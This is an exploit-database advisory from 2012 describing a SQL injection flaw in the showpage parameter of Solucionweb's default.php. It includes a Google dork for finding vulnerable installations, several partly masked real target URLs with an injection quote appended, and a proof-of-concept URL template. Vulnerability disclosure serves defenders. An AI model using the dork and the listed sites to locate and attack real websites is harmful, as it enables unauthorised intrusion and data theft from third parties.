Solucionweb (default.php) SQL Injection Vulnerability

2012.11.06
Credit: ShinoBi-Dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################################################################### # Exploit Title: [ Solucionweb (default.php) SQL Injection Vulnerability ] # Date: [06-11-2012] # Author: [ShinoBi-Dz] # E-mail : ShinoBiDz442@gmail.com # Facebook : https://www.facebook.com/shinobi.DZz # Category: [webapps] # Google dork: "Powered by: Solucionweb.com" inurl:default.php?showpage= # Tested on: [Windows 7 ] ######################################################################### Example Sites : http://www.broXXXXXndsolutions.com.gt/default.php?lng=&showpage=16' http://www.asXXXXgua.com.gt/default.php?lng=&showpage=3' http://bjinternXXXXnal.com/default.php?lng=2&showpage=5' http://www.yXXXXgo.com/default.php?lng=2&showpage=3' http://www.castillXXXXlen.com/default.php?lng=&showpage=20' http://www.biXXXeris.com/web/default.php?lng=2&showpage=3' [~]Exploit/p0c : http://www.site.com/default.php?lng=&showpage=[SQLi] # Greet'z | Mouh Marvel-DZ | Arm4dill0-DZ | Google | Linus Benjamin | LogiCoder Man & All my friends

References:

https://www.facebook.com/shinobi.DZz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top